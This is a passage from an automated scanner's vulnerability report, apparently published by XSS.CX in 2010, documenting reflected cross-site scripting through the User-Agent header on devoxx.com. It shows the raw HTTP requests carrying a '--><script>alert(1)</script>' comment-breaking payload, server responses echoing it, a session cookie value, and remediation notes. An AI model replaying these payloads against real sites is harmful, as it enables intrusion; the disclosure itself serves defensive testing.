User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)29266--><script>alert(1)</script>6dfe39b9927
Connection: close
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:43:28 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289843008668
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 48596

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)29266--><script>alert(1)</script>6dfe39b9927'
layout : 'Builder Layout: DEVOXX2010NSB'
layoutId : 'DEVOXX2010NSB'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Twitter'
contextPath : ''
action name : 'viewpage'

...[SNIP]...

1.43. http://devoxx.com/homepage.action [User-Agent HTTP header]  previous

Summary

Severity:   Low
Confidence:   Certain
Host:   http://devoxx.com
Path:   /homepage.action

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload d93d1--><script>alert(1)</script>8a3892b45b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /homepage.action HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)d93d1--><script>alert(1)</script>8a3892b45b
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: devoxx.com
Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 17:38:31 GMT
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Confluence-Request-Time: 1289842711321
Vary: User-Agent
Content-Type: text/html;charset=UTF-8
Content-Length: 38366

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
userAgent: 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)d93d1--><script>alert(1)</script>8a3892b45b'
layout : 'Builder Layout: DEVOXX2010'
layoutId : 'DEVOXX2010'
spaceName : 'Devoxx 2010'
currentURL : '/display/Devoxx2K10/Home'
contextPath : ''
action name : 'viewpage'
********
...[SNIP]...

Report generated by XSS.CX at Mon Nov 15 11:49:15 CST 2010.